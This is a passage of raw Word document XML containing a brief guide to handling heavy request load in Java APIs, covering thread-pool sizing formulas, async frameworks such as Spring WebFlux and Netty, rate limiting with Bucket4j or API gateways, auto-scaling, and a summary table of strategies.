          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, use:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>threads = cores * (1 + CPU utilization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D758305" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="0047282D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If tasks are </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IO-bound</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can afford more threads:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>threads = cores * (1 + wait time / service time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50303E24" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00000000" w:rsidP="0047282D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3886ABD1">
          <v:rect id="_x0000_i1881" style="width:0;height:1.5pt" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CCD77F" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3) Use Asynchronous Non-Blocking Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E741CF7" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Netty</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10,000+ concurrent requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with far fewer threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47883D45" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Useful for IO-heavy APIs (DB calls, HTTP clients).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A35E8D" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00000000" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="217A357D">
          <v:rect id="_x0000_i1882" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="266F22F0" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4) Rate Limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109C1141" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bucket4j</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resilience4j</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or API Gateway (e.g., AWS API Gateway, Kong) to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>throttle or reject</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> excess requests gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4EA9B4" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00000000" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="6862B79A">
          <v:rect id="_x0000_i1883" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD135FC" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5) Auto-Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0710C4FD" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Horizontally </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scale the API server</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a load balancer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2961D97B" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Run more containers or instances behind a load balancer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E106AC" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00000000" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="2E2A7BD1">
          <v:rect id="_x0000_i1884" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C9B6CC" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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34"/>
        <w:gridCol w:w="3729"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B758F9" w:rsidRPr="00B758F9" w14:paraId="021DBB8F" w14:textId="77777777" w:rsidTr="00B758F9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D76806F" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B758F9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Strategy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3629F160" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B758F9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B758F9" w:rsidRPr="00B758F9" w14:paraId="0CD704DC" w14:textId="77777777" w:rsidTr="00B758F9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49B0FB98" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B758F9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Bounded Queue + Backpressure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25B0DB3A" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B758F9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Prevents system crash due to overload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B758F9" w:rsidRPr="00B758F9" w14:paraId="4AE5BC2C" w14:textId="77777777" w:rsidTr="00B758F9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FE215A9" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B758F9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thread Tuning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F65AE8B" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B758F9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Matches capacity to hardware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B758F9" w:rsidRPr="00B758F9" w14:paraId="3A27F499" w14:textId="77777777" w:rsidTr="00B758F9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A70CE3B" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B758F9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Async Frameworks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04A49D01" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B758F9">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Scales beyond thread-per-request model</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B758F9" w:rsidRPr="00B758F9" w14:paraId="3B07E1DB" w14:textId="77777777" w:rsidTr="00B758F9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29DF6521" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
